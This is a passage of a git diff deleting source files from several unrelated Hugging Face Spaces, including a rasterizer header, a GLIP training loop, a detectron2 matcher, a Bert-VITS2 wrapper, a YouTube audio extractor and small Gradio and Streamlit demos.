- int numTriangles; // Number of triangles. - int numVertices; // Number of vertices. - int width; // Image width. - int height; // Image height. - int depth; // Size of minibatch. - int instance_mode; // 1 if in instance rendering mode. - float xs, xo, ys, yo; // Pixel position to clip-space x, y transform. -}; - -//------------------------------------------------------------------------ -// Do not try to include OpenGL stuff when compiling CUDA kernels for torch. - -#if !(defined(NVDR_TORCH) && defined(__CUDACC__)) -#include "framework.h" -#include "glutil.h" - -//------------------------------------------------------------------------ -// Draw command struct used by rasterizer. - -struct GLDrawCmd -{ - uint32_t count; - uint32_t instanceCount; - uint32_t firstIndex; - uint32_t baseVertex; - uint32_t baseInstance; -}; - -//------------------------------------------------------------------------ -// OpenGL-related persistent state for forward op. - -struct RasterizeGLState -{ - int width; // Allocated frame buffer width. - int height; // Allocated frame buffer height. - int depth; // Allocated frame buffer depth. - int posCount; // Allocated position buffer in floats. - int triCount; // Allocated triangle buffer in ints. - GLContext glctx; - GLuint glFBO; - GLuint glColorBuffer[2]; - GLuint glPrevOutBuffer; - GLuint glDepthStencilBuffer; - GLuint glVAO; - GLuint glTriBuffer; - GLuint glPosBuffer; - GLuint glProgram; - GLuint glProgramDP; - GLuint glVertexShader; - GLuint glGeometryShader; - GLuint glFragmentShader; - GLuint glFragmentShaderDP; - cudaGraphicsResource_t cudaColorBuffer[2]; - cudaGraphicsResource_t cudaPrevOutBuffer; - cudaGraphicsResource_t cudaPosBuffer; - cudaGraphicsResource_t cudaTriBuffer; - std::vector drawCmdBuffer; - int enableDB; -}; - -//------------------------------------------------------------------------ -// Shared C++ code prototypes. 
- -void rasterizeInitGLContext(NVDR_CTX_ARGS, RasterizeGLState& s, int cudaDeviceIdx); -void rasterizeResizeBuffers(NVDR_CTX_ARGS, RasterizeGLState& s, int posCount, int triCount, int width, int height, int depth); -void rasterizeRender(NVDR_CTX_ARGS, RasterizeGLState& s, cudaStream_t stream, const float* posPtr, int posCount, int vtxPerInstance, const int32_t* triPtr, int triCount, const int32_t* rangesPtr, int width, int height, int depth, int peeling_idx); -void rasterizeCopyResults(NVDR_CTX_ARGS, RasterizeGLState& s, cudaStream_t stream, float** outputPtr, int width, int height, int depth); - -//------------------------------------------------------------------------ -#endif // !(defined(NVDR_TORCH) && defined(__CUDACC__)) diff --git a/spaces/haakohu/deep_privacy2_face/dp2/utils/cse.py b/spaces/haakohu/deep_privacy2_face/dp2/utils/cse.py deleted file mode 100644 index cd3e01d28ba10e6d4d14ecd49c3a70dcaaa194ce..0000000000000000000000000000000000000000 --- a/spaces/haakohu/deep_privacy2_face/dp2/utils/cse.py +++ /dev/null @@ -1,21 +0,0 @@ -import warnings -import torch -from densepose.modeling.cse.utils import get_closest_vertices_mask_from_ES - - -def from_E_to_vertex(E, M, embed_map): - """ - M is 1 for unkown regions - """ - assert len(E.shape) == 4 - assert len(E.shape) == len(M.shape), (E.shape, M.shape) - assert E.shape[0] == 1 - M = M.float() - M = torch.cat([M, 1-M], dim=1) - with warnings.catch_warnings(): # Ignore userError for pytorch interpolate from detectron2 - warnings.filterwarnings("ignore") - vertices, _ = get_closest_vertices_mask_from_ES( - E, M, E.shape[2], E.shape[3], - embed_map, device=E.device) - - return vertices.long() diff --git a/spaces/hamelcubsfan/AutoGPT/autogpt/commands/write_tests.py b/spaces/hamelcubsfan/AutoGPT/autogpt/commands/write_tests.py deleted file mode 100644 index 35a086536c9d05d520a84b15ead49f775eacdcc9..0000000000000000000000000000000000000000 --- a/spaces/hamelcubsfan/AutoGPT/autogpt/commands/write_tests.py +++ /dev/null @@ -1,31 +0,0 @@ -"""A module that contains a function to generate test cases for the submitted code.""" -from __future__ import annotations - -import json - -from autogpt.llm_utils import call_ai_function - - -def write_tests(code: str, focus: list[str]) -> str: - """ - A function that takes in code and focus topics and returns a response from create - chat completion api call. - - Parameters: - focus (list): A list of suggestions around what needs to be improved. - code (str): Code for test cases to be generated against. - Returns: - A result string from create chat completion. Test cases for the submitted code - in response. - """ - - function_string = ( - "def create_test_cases(code: str, focus: Optional[str] = None) -> str:" - ) - args = [code, json.dumps(focus)] - description_string = ( - "Generates test cases for the existing code, focusing on" - " specific areas if required." 
- ) - - return call_ai_function(function_string, args, description_string) diff --git a/spaces/hamelcubsfan/AutoGPT/autogpt/processing/__init__.py b/spaces/hamelcubsfan/AutoGPT/autogpt/processing/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/haotiz/glip-zeroshot-demo/maskrcnn_benchmark/engine/trainer.py b/spaces/haotiz/glip-zeroshot-demo/maskrcnn_benchmark/engine/trainer.py deleted file mode 100644 index 8831755892481b6603e5ea5c3b64aff3930b6486..0000000000000000000000000000000000000000 --- a/spaces/haotiz/glip-zeroshot-demo/maskrcnn_benchmark/engine/trainer.py +++ /dev/null @@ -1,360 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. -import datetime -import logging -import sys -import os -import math -import time - -import torch -import torch.distributed as dist - -from maskrcnn_benchmark.utils.comm import get_world_size, all_gather, is_main_process, broadcast_data, get_rank -from maskrcnn_benchmark.utils.metric_logger import MetricLogger -from maskrcnn_benchmark.utils.ema import ModelEma -from maskrcnn_benchmark.utils.amp import autocast, GradScaler -from maskrcnn_benchmark.data.datasets.evaluation import evaluate -from .inference import inference -import pdb - -def reduce_loss_dict(loss_dict): - """ - Reduce the loss dictionary from all processes so that process with rank - 0 has the averaged results. Returns a dict with the same fields as - loss_dict, after reduction. - """ - world_size = get_world_size() - if world_size < 2: - return loss_dict - with torch.no_grad(): - loss_names = [] - all_losses = [] - for k in sorted(loss_dict.keys()): - loss_names.append(k) - all_losses.append(loss_dict[k]) - all_losses = torch.stack(all_losses, dim=0) - dist.reduce(all_losses, dst=0) - if dist.get_rank() == 0: - # only main process gets accumulated, so only divide by - # world_size in this case - all_losses /= world_size - reduced_losses = {k: v for k, v in zip(loss_names, all_losses)} - return reduced_losses - - -def do_train( - cfg, - model, - data_loader, - optimizer, - scheduler, - checkpointer, - device, - checkpoint_period, - arguments, - val_data_loader=None, - meters=None, - zero_shot=False -): - logger = logging.getLogger("maskrcnn_benchmark.trainer") - logger.info("Start training") - # meters = MetricLogger(delimiter=" ") - max_iter = len(data_loader) - start_iter = arguments["iteration"] - model.train() - model_ema = None - if cfg.SOLVER.MODEL_EMA > 0: - model_ema = ModelEma(model, decay=cfg.SOLVER.MODEL_EMA) - start_training_time = time.time() - end = time.time() - - if cfg.SOLVER.USE_AMP: - scaler = GradScaler() - - global_rank = get_rank() - - if cfg.SOLVER.CHECKPOINT_PER_EPOCH != -1 and cfg.SOLVER.MAX_EPOCH >= 1: - checkpoint_period = len(data_loader) * cfg.SOLVER.CHECKPOINT_PER_EPOCH // cfg.SOLVER.MAX_EPOCH - - if global_rank <= 0 and cfg.SOLVER.MAX_EPOCH >= 1: - print("Iter per epoch ", len(data_loader) // cfg.SOLVER.MAX_EPOCH ) - - if cfg.SOLVER.AUTO_TERMINATE_PATIENCE != -1: - patience_counter = 0 - previous_best = 0.0 - - # Adapt the weight decay - if cfg.SOLVER.WEIGHT_DECAY_SCHEDULE and hasattr(scheduler, 'milestones'): - milestone_target = 0 - for i, milstone in enumerate(list(scheduler.milestones)): - if scheduler.last_epoch >= milstone * cfg.SOLVER.WEIGHT_DECAY_SCHEDULE_RATIO: - milestone_target = i+1 - for iteration, (images, targets, idxs, positive_map, positive_map_eval, greenlight_map) in enumerate(data_loader, start_iter): - nnegative = 
sum(len(target) < 1 for target in targets) - nsample = len(targets) - if nsample == nnegative or nnegative > nsample * cfg.SOLVER.MAX_NEG_PER_BATCH: - logger.info('[WARNING] Sampled {} negative in {} in a batch, greater the allowed ratio {}, skip'. - format(nnegative, nsample, cfg.SOLVER.MAX_NEG_PER_BATCH)) - continue - - data_time = time.time() - end - iteration = iteration + 1 - arguments["iteration"] = iteration - - images = images.to(device) - captions = None - try: - targets = [target.to(device) for target in targets] - captions = [t.get_field("caption") for t in targets if "caption" in t.fields()] - except: - pass - # Freeze language backbone - if cfg.MODEL.LANGUAGE_BACKBONE.FREEZE: - if hasattr(model, "module"): - model.module.language_backbone.eval() - else: - model.language_backbone.eval() - - if cfg.SOLVER.USE_AMP: - with autocast(): - if len(captions) > 0: - loss_dict = model(images, targets, captions, positive_map, greenlight_map = greenlight_map) - else: - loss_dict = model(images, targets) - losses = sum(loss for loss in loss_dict.values()) - - # save checkpoints for further debug if nan happens - # loss_value = losses.item() - # if not math.isfinite(loss_value): - # logging.error(f'=> loss is {loss_value}, stopping training') - # logging.error("Losses are : {}".format(loss_dict)) - # time_str = time.strftime('%Y-%m-%d-%H-%M') - # fname = os.path.join(checkpointer.save_dir, f'{time_str}_states.pth') - # logging.info(f'=> save error state to {fname}') - # dict_to_save = { - # 'x': images, - # 'y': targets, - # 'loss': losses, - # 'states': model.module.state_dict() if hasattr(model, 'module') else model.state_dict() - # } - # if len(captions) > 0: - # dict_to_save['captions'] = captions - # dict_to_save['positive_map'] = positive_map - # torch.save( - # dict_to_save, - # fname - # ) - - - if torch.isnan(losses) or torch.isinf(losses): - logging.error("NaN encountered, ignoring") - losses[losses != losses] = 0 - optimizer.zero_grad() - scaler.scale(losses).backward() - scaler.step(optimizer) - scaler.update() - scheduler.step() - else: - if len(captions) > 0: - loss_dict = model(images, targets, captions, positive_map) - else: - loss_dict = model(images, targets) - losses = sum(loss for loss in loss_dict.values()) - - # loss_value = losses.item() - # if not math.isfinite(loss_value): - # logging.error(f'=> loss is {loss_value}, stopping training') - # time_str = time.strftime('%Y-%m-%d-%H-%M') - # fname = os.path.join(checkpointer.save_dir, f'{time_str}_states.pth') - # logging.info(f'=> save error state to {fname}') - # dict_to_save = { - # 'x': images, - # 'y': targets, - # 'loss': losses, - # 'states': model.module.state_dict() if hasattr(model, 'module') else model.state_dict() - # } - # if len(captions) > 0: - # dict_to_save['captions'] = captions - # dict_to_save['positive_map'] = positive_map - # torch.save( - # dict_to_save, - # fname - # ) - - - if torch.isnan(losses) or torch.isinf(losses): - losses[losses != losses] = 0 - optimizer.zero_grad() - losses.backward() - optimizer.step() - scheduler.step() - - # Adapt the weight decay: only support multiStepLR - if cfg.SOLVER.WEIGHT_DECAY_SCHEDULE and hasattr(scheduler, 'milestones'): - if milestone_target < len(scheduler.milestones): - next_milestone = list(scheduler.milestones)[milestone_target] - else: - next_milestone = float('inf') - if scheduler.last_epoch >= next_milestone * cfg.SOLVER.WEIGHT_DECAY_SCHEDULE_RATIO: - gamma = scheduler.gamma - logger.info("Drop the weight decay by {}!".format(gamma)) - for param in 
optimizer.param_groups: - if 'weight_decay' in param: - param['weight_decay'] *= gamma - # move the target forward - milestone_target += 1 - - # reduce losses over all GPUs for logging purposes - loss_dict_reduced = reduce_loss_dict(loss_dict) - losses_reduced = sum(loss for loss in loss_dict_reduced.values()) - meters.update(loss=losses_reduced, **loss_dict_reduced) - if model_ema is not None: - model_ema.update(model) - arguments["model_ema"] = model_ema.state_dict() - - batch_time = time.time() - end - end = time.time() - meters.update(time=batch_time, data=data_time) - eta_seconds = meters.time.global_avg * (max_iter - iteration) - eta_string = str(datetime.timedelta(seconds=int(eta_seconds))) - - if iteration % 20 == 0 or iteration == max_iter: - # if iteration % 1 == 0 or iteration == max_iter: - #logger.info( - if global_rank <= 0: - print( - meters.delimiter.join( - [ - "eta: {eta}", - "iter: {iter}", - "{meters}", - "lr: {lr:.6f}", - "wd: {wd:.6f}", - "max mem: {memory:.0f}", - ] - ).format( - eta=eta_string, - iter=iteration, - meters=str(meters), - lr=optimizer.param_groups[0]["lr"], - wd=optimizer.param_groups[0]["weight_decay"], - memory=torch.cuda.max_memory_allocated() / 1024.0 / 1024.0, - ) - ) - if val_data_loader and (iteration % checkpoint_period == 0 or iteration == max_iter): - if is_main_process(): - print("Evaluating") - eval_result = 0.0 - model.eval() - if cfg.SOLVER.TEST_WITH_INFERENCE: - with torch.no_grad(): - try: - _model = model.module - except: - _model = model - _result = inference( - model = _model, - data_loader = val_data_loader, - dataset_name="val", - device=device, - expected_results=cfg.TEST.EXPECTED_RESULTS, - expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL, - output_folder=None, - cfg=cfg, - verbose=False - ) - if is_main_process(): - eval_result = _result[0].results['bbox']['AP'] - else: - results_dict = {} - cpu_device = torch.device("cpu") - for i, batch in enumerate(val_data_loader): - images, targets, image_ids, positive_map, *_ = batch - with torch.no_grad(): - images = images.to(device) - if positive_map is None: - output = model(images) - else: - captions = [t.get_field("caption") for t in targets if "caption" in t.fields()] - output = model(images, captions, positive_map) - output = [o.to(cpu_device) for o in output] - results_dict.update( - {img_id: result for img_id, result in zip(image_ids, output)} - ) - all_predictions = all_gather(results_dict) - if is_main_process(): - predictions = {} - for p in all_predictions: - predictions.update(p) - predictions = [predictions[i] for i in list(sorted(predictions.keys()))] - eval_result, _ = evaluate(val_data_loader.dataset, predictions, output_folder=None, - box_only=cfg.DATASETS.CLASS_AGNOSTIC) - if cfg.DATASETS.CLASS_AGNOSTIC: - eval_result = eval_result.results['box_proposal']['AR@100'] - else: - eval_result = eval_result.results['bbox']['AP'] - model.train() - - if model_ema is not None and cfg.SOLVER.USE_EMA_FOR_MONITOR: - model_ema.ema.eval() - results_dict = {} - cpu_device = torch.device("cpu") - for i, batch in enumerate(val_data_loader): - images, targets, image_ids, positive_map, positive_map_eval = batch - with torch.no_grad(): - images = images.to(device) - if positive_map is None: - output = model_ema.ema(images) - else: - captions = [t.get_field("caption") for t in targets if "caption" in t.fields()] - output = model_ema.ema(images, captions, positive_map) - output = [o.to(cpu_device) for o in output] - results_dict.update( - {img_id: result for img_id, result in 
zip(image_ids, output)} - ) - all_predictions = all_gather(results_dict) - if is_main_process(): - predictions = {} - for p in all_predictions: - predictions.update(p) - predictions = [predictions[i] for i in list(sorted(predictions.keys()))] - eval_result, _ = evaluate(val_data_loader.dataset, predictions, output_folder=None, - box_only=cfg.DATASETS.CLASS_AGNOSTIC) - if cfg.DATASETS.CLASS_AGNOSTIC: - eval_result = eval_result.results['box_proposal']['AR@100'] - else: - eval_result = eval_result.results['bbox']['AP'] - - arguments.update(eval_result=eval_result) - - if cfg.SOLVER.USE_AUTOSTEP: - eval_result = all_gather(eval_result)[0] #broadcast_data([eval_result])[0] - # print("Rank {} eval result gathered".format(cfg.local_rank), eval_result) - scheduler.step(eval_result) - - if cfg.SOLVER.AUTO_TERMINATE_PATIENCE != -1: - if eval_result < previous_best: - patience_counter += 1 - else: - patience_counter = 0 - previous_best = eval_result - checkpointer.save("model_best", **arguments) - print("Previous Best", previous_best, "Patience Counter", patience_counter, "Eval Result", eval_result) - if patience_counter >= cfg.SOLVER.AUTO_TERMINATE_PATIENCE: - if is_main_process(): - print("\n\n\n\nAuto Termination at {}, current best {}\n\n\n".format(iteration, previous_best)) - break - - if iteration % checkpoint_period == 0: - checkpointer.save("model_{:07d}".format(iteration), **arguments) - if iteration == max_iter: - checkpointer.save("model_final", **arguments) - break - - total_training_time = time.time() - start_training_time - total_time_str = str(datetime.timedelta(seconds=total_training_time)) - logger.info( - "Total training time: {} ({:.4f} s / it)".format( - total_time_str, total_training_time / (max_iter) - ) - ) diff --git a/spaces/hasibzunair/fifa-tryon-demo/Self-Correction-Human-Parsing-for-ACGPN/mhp_extension/detectron2/detectron2/modeling/matcher.py b/spaces/hasibzunair/fifa-tryon-demo/Self-Correction-Human-Parsing-for-ACGPN/mhp_extension/detectron2/detectron2/modeling/matcher.py deleted file mode 100644 index 2911f8c1937749dec4dbe64aa3e8491a631e03f2..0000000000000000000000000000000000000000 --- a/spaces/hasibzunair/fifa-tryon-demo/Self-Correction-Human-Parsing-for-ACGPN/mhp_extension/detectron2/detectron2/modeling/matcher.py +++ /dev/null @@ -1,123 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved -from typing import List -import torch - - -class Matcher(object): - """ - This class assigns to each predicted "element" (e.g., a box) a ground-truth - element. Each predicted element will have exactly zero or one matches; each - ground-truth element may be matched to zero or more predicted elements. - - The matching is determined by the MxN match_quality_matrix, that characterizes - how well each (ground-truth, prediction)-pair match each other. For example, - if the elements are boxes, this matrix may contain box intersection-over-union - overlap values. - - The matcher returns (a) a vector of length N containing the index of the - ground-truth element m in [0, M) that matches to prediction n in [0, N). - (b) a vector of length N containing the labels for each prediction. - """ - - def __init__( - self, thresholds: List[float], labels: List[int], allow_low_quality_matches: bool = False - ): - """ - Args: - thresholds (list): a list of thresholds used to stratify predictions - into levels. - labels (list): a list of values to label predictions belonging at - each level. 
A label can be one of {-1, 0, 1} signifying - {ignore, negative class, positive class}, respectively. - allow_low_quality_matches (bool): if True, produce additional matches - for predictions with maximum match quality lower than high_threshold. - See set_low_quality_matches_ for more details. - - For example, - thresholds = [0.3, 0.5] - labels = [0, -1, 1] - All predictions with iou < 0.3 will be marked with 0 and - thus will be considered as false positives while training. - All predictions with 0.3 <= iou < 0.5 will be marked with -1 and - thus will be ignored. - All predictions with 0.5 <= iou will be marked with 1 and - thus will be considered as true positives. - """ - # Add -inf and +inf to first and last position in thresholds - thresholds = thresholds[:] - assert thresholds[0] > 0 - thresholds.insert(0, -float("inf")) - thresholds.append(float("inf")) - assert all(low <= high for (low, high) in zip(thresholds[:-1], thresholds[1:])) - assert all(l in [-1, 0, 1] for l in labels) - assert len(labels) == len(thresholds) - 1 - self.thresholds = thresholds - self.labels = labels - self.allow_low_quality_matches = allow_low_quality_matches - - def __call__(self, match_quality_matrix): - """ - Args: - match_quality_matrix (Tensor[float]): an MxN tensor, containing the - pairwise quality between M ground-truth elements and N predicted - elements. All elements must be >= 0 (due to the us of `torch.nonzero` - for selecting indices in :meth:`set_low_quality_matches_`). - - Returns: - matches (Tensor[int64]): a vector of length N, where matches[i] is a matched - ground-truth index in [0, M) - match_labels (Tensor[int8]): a vector of length N, where pred_labels[i] indicates - whether a prediction is a true or false positive or ignored - """ - assert match_quality_matrix.dim() == 2 - if match_quality_matrix.numel() == 0: - default_matches = match_quality_matrix.new_full( - (match_quality_matrix.size(1),), 0, dtype=torch.int64 - ) - # When no gt boxes exist, we define IOU = 0 and therefore set labels - # to `self.labels[0]`, which usually defaults to background class 0 - # To choose to ignore instead, can make labels=[-1,0,-1,1] + set appropriate thresholds - default_match_labels = match_quality_matrix.new_full( - (match_quality_matrix.size(1),), self.labels[0], dtype=torch.int8 - ) - return default_matches, default_match_labels - - assert torch.all(match_quality_matrix >= 0) - - # match_quality_matrix is M (gt) x N (predicted) - # Max over gt elements (dim 0) to find best gt candidate for each prediction - matched_vals, matches = match_quality_matrix.max(dim=0) - - match_labels = matches.new_full(matches.size(), 1, dtype=torch.int8) - - for (l, low, high) in zip(self.labels, self.thresholds[:-1], self.thresholds[1:]): - low_high = (matched_vals >= low) & (matched_vals < high) - match_labels[low_high] = l - - if self.allow_low_quality_matches: - self.set_low_quality_matches_(match_labels, match_quality_matrix) - - return matches, match_labels - - def set_low_quality_matches_(self, match_labels, match_quality_matrix): - """ - Produce additional matches for predictions that have only low-quality matches. - Specifically, for each ground-truth G find the set of predictions that have - maximum overlap with it (including ties); for each prediction in that set, if - it is unmatched, then match it to the ground-truth G. - - This function implements the RPN assignment case (i) in Sec. 3.1.2 of - :paper:`Faster R-CNN`. 
- """ - # For each gt, find the prediction with which it has highest quality - highest_quality_foreach_gt, _ = match_quality_matrix.max(dim=1) - # Find the highest quality match available, even if it is low, including ties. - # Note that the matches qualities must be positive due to the use of - # `torch.nonzero`. - _, pred_inds_with_highest_quality = torch.nonzero( - match_quality_matrix == highest_quality_foreach_gt[:, None], as_tuple=True - ) - # If an anchor was labeled positive only due to a low-quality match - # with gt_A, but it has larger overlap with gt_B, it's matched index will still be gt_B. - # This follows the implementation in Detectron, and is found to have no significant impact. - match_labels[pred_inds_with_highest_quality] = 1 diff --git a/spaces/hasibzunair/fifa-tryon-demo/Self-Correction-Human-Parsing-for-ACGPN/mhp_extension/detectron2/projects/DensePose/densepose/utils/transform.py b/spaces/hasibzunair/fifa-tryon-demo/Self-Correction-Human-Parsing-for-ACGPN/mhp_extension/detectron2/projects/DensePose/densepose/utils/transform.py deleted file mode 100644 index b7cfe097234dbd3ff19b84ecdfb63fd8bf5fd4b6..0000000000000000000000000000000000000000 --- a/spaces/hasibzunair/fifa-tryon-demo/Self-Correction-Human-Parsing-for-ACGPN/mhp_extension/detectron2/projects/DensePose/densepose/utils/transform.py +++ /dev/null @@ -1,16 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved -from fvcore.common.file_io import PathManager - -from detectron2.data import MetadataCatalog - -from densepose import DensePoseTransformData - - -def load_for_dataset(dataset_name): - path = MetadataCatalog.get(dataset_name).densepose_transform_src - densepose_transform_data_fpath = PathManager.get_local_path(path) - return DensePoseTransformData.load(densepose_transform_data_fpath) - - -def load_from_cfg(cfg): - return load_for_dataset(cfg.DATASETS.TEST[0]) diff --git a/spaces/hezhaoqia/vits-simple-api/bert_vits2/bert_vits2.py b/spaces/hezhaoqia/vits-simple-api/bert_vits2/bert_vits2.py deleted file mode 100644 index 6b56d52387e25553d2545c8e4b5c4be5602876ab..0000000000000000000000000000000000000000 --- a/spaces/hezhaoqia/vits-simple-api/bert_vits2/bert_vits2.py +++ /dev/null @@ -1,86 +0,0 @@ -import numpy as np -import torch - -from bert_vits2 import utils, commons -from bert_vits2.models import SynthesizerTrn -from bert_vits2.text import symbols, cleaned_text_to_sequence, get_bert -from bert_vits2.text.cleaner import clean_text -from utils.nlp import sentence_split, cut - - -class Bert_VITS2: - def __init__(self, model, config, device=torch.device("cpu")): - self.hps_ms = utils.get_hparams_from_file(config) - self.n_speakers = getattr(self.hps_ms.data, 'n_speakers', 0) - self.speakers = [item[0] for item in - sorted(list(getattr(self.hps_ms.data, 'spk2id', {'0': 0}).items()), key=lambda x: x[1])] - self.net_g = SynthesizerTrn( - len(symbols), - self.hps_ms.data.filter_length // 2 + 1, - self.hps_ms.train.segment_size // self.hps_ms.data.hop_length, - n_speakers=self.hps_ms.data.n_speakers, - **self.hps_ms.model).to(device) - _ = self.net_g.eval() - self.device = device - self.load_model(model) - - def load_model(self, model): - utils.load_checkpoint(model, self.net_g, None, skip_optimizer=True) - - def get_speakers(self): - return self.speakers - - def get_text(self, text, language_str, hps): - norm_text, phone, tone, word2ph = clean_text(text, language_str) - # print([f"{p}{t}" for p, t in zip(phone, tone)]) - phone, tone, language = cleaned_text_to_sequence(phone, tone, 
language_str) - - if hps.data.add_blank: - phone = commons.intersperse(phone, 0) - tone = commons.intersperse(tone, 0) - language = commons.intersperse(language, 0) - for i in range(len(word2ph)): - word2ph[i] = word2ph[i] * 2 - word2ph[0] += 1 - bert = get_bert(norm_text, word2ph, language_str) - - assert bert.shape[-1] == len(phone) - - phone = torch.LongTensor(phone) - tone = torch.LongTensor(tone) - language = torch.LongTensor(language) - - return bert, phone, tone, language - - def infer(self, text, sdp_ratio, noise_scale, noise_scale_w, length_scale, sid): - bert, phones, tones, lang_ids = self.get_text(text, "ZH", self.hps_ms) - with torch.no_grad(): - x_tst = phones.to(self.device).unsqueeze(0) - tones = tones.to(self.device).unsqueeze(0) - lang_ids = lang_ids.to(self.device).unsqueeze(0) - bert = bert.to(self.device).unsqueeze(0) - x_tst_lengths = torch.LongTensor([phones.size(0)]).to(self.device) - speakers = torch.LongTensor([int(sid)]).to(self.device) - audio = self.net_g.infer(x_tst, x_tst_lengths, speakers, tones, lang_ids, bert, sdp_ratio=sdp_ratio - , noise_scale=noise_scale, noise_scale_w=noise_scale_w, length_scale=length_scale)[ - 0][0, 0].data.cpu().float().numpy() - - torch.cuda.empty_cache() - return audio - - def get_audio(self, voice, auto_break=False): - text = voice.get("text", None) - sdp_ratio = voice.get("sdp_ratio", 0.2) - noise_scale = voice.get("noise", 0.5) - noise_scale_w = voice.get("noisew", 0.6) - length_scale = voice.get("length", 1) - sid = voice.get("id", 0) - max = voice.get("max", 50) - # sentence_list = sentence_split(text, max, "ZH", ["zh"]) - sentence_list = cut(text, max) - audios = [] - for sentence in sentence_list: - audio = self.infer(sentence, sdp_ratio, noise_scale, noise_scale_w, length_scale, sid) - audios.append(audio) - audio = np.concatenate(audios) - return audio diff --git a/spaces/hkunlp/Binder/utils/tab_fact/__init__.py b/spaces/hkunlp/Binder/utils/tab_fact/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/hu-po/speech2speech/src/tube.py b/spaces/hu-po/speech2speech/src/tube.py deleted file mode 100644 index f849f30ca45e97722130e4fd32f4cce604d7d74f..0000000000000000000000000000000000000000 --- a/spaces/hu-po/speech2speech/src/tube.py +++ /dev/null @@ -1,64 +0,0 @@ -''' -Extract audio from a YouTube video - -Usage: - tube.py [-s ] [-d ] -''' - -import subprocess -from pathlib import Path -import datetime -import argparse -import os -from pytube import YouTube - -# Define argparse arguments -parser = argparse.ArgumentParser(description='Extract audio from a YouTube video') -parser.add_argument('url', type=str, help='the YouTube video URL') -parser.add_argument('person', type=str, help='the name of the person speaking') -parser.add_argument('-s', '--start-time', type=float, default=0, help='the start time in minutes for the extracted audio (default: 0)') -parser.add_argument('-d', '--duration', type=int, help='the duration in seconds for the extracted audio (default: 60)') - - -# 200 seconds seems to be max duration for single clips -def extract_audio(url: str, label: str, start_minute: float = 0, duration: int = 200): - - # Download the YouTube video - youtube_object = YouTube(url) - stream = youtube_object.streams.first() - video_path = Path(stream.download(skip_existing=True)) - - # Convert start time to seconds - start_time_seconds = int(start_minute * 60) - - # Format the start time in HH:MM:SS.mmm format - start_time_formatted = 
str(datetime.timedelta(seconds=start_time_seconds)) - start_time_formatted = start_time_formatted[:11] + start_time_formatted[12:] - - # Set the output path using the audio file name - output_path = video_path.parent / f"{label}.wav" - - # Run ffmpeg to extract the audio - cmd = ['ffmpeg', '-y', '-i', str(video_path), '-ss', start_time_formatted] - if duration is not None: - # Format the duration in HH:MM:SS.mmm format - duration_formatted = str(datetime.timedelta(seconds=duration)) - duration_formatted = duration_formatted[:11] + duration_formatted[12:] - cmd += ['-t', duration_formatted] - cmd += ['-q:a', '0', '-map', 'a', str(output_path)] - subprocess.run(cmd) - - # remove the extra .3gpp file that is created: - for file in os.listdir(video_path.parent): - if file.endswith(".3gpp"): - os.remove(os.path.join(video_path.parent, file)) - - return output_path - -if __name__ == '__main__': - - # Parse the arguments - args = parser.parse_args() - - # Extract the audio - extract_audio(args.url, args.person, args.start_time, args.duration) \ No newline at end of file diff --git a/spaces/huspacy/example-applications/examples/relation.py b/spaces/huspacy/example-applications/examples/relation.py deleted file mode 100644 index 09a6e5962f658381b053fd5573815ad671a2eccc..0000000000000000000000000000000000000000 --- a/spaces/huspacy/example-applications/examples/relation.py +++ /dev/null @@ -1,53 +0,0 @@ -import gradio as gr -import pandas as pd - -from examples.common import NLP -from resources import triples - - -def process(text: str) -> pd.DataFrame: - doc = NLP(text) - tuples_to_list = list() - - tuples = triples.subject_verb_object_triples(doc) - if tuples: - tuples_to_list = list(tuples) - - subject = "" - verb = "" - object = "" - - if len(tuples_to_list) == 0: - return pd.DataFrame([["-", "-", "-"]], columns=['Subject', 'Verb', 'Object']) - - for sub_multiple in tuples_to_list[0][0]: - subject += str(sub_multiple) + ", " - subject = subject[:-2] - for verb_multiple in tuples_to_list[0][1]: - verb += str(verb_multiple) + ", " - verb = verb[:-2] - for obj_multiple in tuples_to_list[0][2]: - object += str(obj_multiple) + ", " - object = object[:-2] - - relation_list = [[subject, verb, object]] - - return pd.DataFrame(relation_list, columns=['Subject', 'Verb', 'Object']) - - -EXAMPLES = [ - "Anna éppen most házat épít magának.", - "Noémi gulyáslevest szeret főzni, ha éhes.", - "Balázs jéghideg helyi ananászlevet ivott Hawaii fehér homokos partján.", - "Júliska fagyit árul a nyáron teljes állásban.", - "Einstein megmutatta a házát építés közben.", - "Hawking nyilatkozott egy levelet, miszerint a felfedezései az élete legizgalmasabb eseményei voltak." 
-] - -demo = gr.Interface( - fn=process, - inputs=gr.Textbox(value=EXAMPLES[0], lines=10, label="Input text", show_label=True), - outputs=gr.DataFrame(label="Keywords", show_label=False, max_cols=3, max_rows=1), - examples=EXAMPLES, - cache_examples=False, -) diff --git a/spaces/hv68/sample_tool_1/app.py b/spaces/hv68/sample_tool_1/app.py deleted file mode 100644 index 99a0bd777e0631efe97e53a29f9bc7c10bdb6222..0000000000000000000000000000000000000000 --- a/spaces/hv68/sample_tool_1/app.py +++ /dev/null @@ -1,237 +0,0 @@ -import streamlit as st -import pandas as pd -import sys -import os -from datasets import load_from_disk -# from st_aggrid import AgGrid, GridOptionsBuilder, GridUpdateMode -from sklearn.metrics.pairwise import cosine_similarity -import numpy as np -import time -from annotated_text import annotated_text - - -ABSOLUTE_PATH = os.path.dirname(__file__) -ASSETS_PATH = os.path.join(ABSOLUTE_PATH, 'model_assets') - - -from nltk.data import find -import nltk -import gensim - -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_embed_model(): - nltk.download("word2vec_sample") - word2vec_sample = str(find('models/word2vec_sample/pruned.word2vec.txt')) - - model = gensim.models.KeyedVectors.load_word2vec_format(word2vec_sample, binary=False) - return model - -@st.cache(suppress_st_warning=True, allow_output_mutation=True) -def get_top_n_closest(query_word, candidate, n): - model = get_embed_model() - t = time.time() - p_c = preprocess_text(candidate) - similarity = [] - t = time.time() - for i in p_c: - try: - similarity.append(model.similarity(query_word, i)) - except: - similarity.append(0) - top_n = min(len(p_c), n) - t = time.time() - sorted = (-1*np.array(similarity)).argsort()[:top_n] - top = [p_c[i] for i in sorted] - return top - -@st.cache(suppress_st_warning=True, 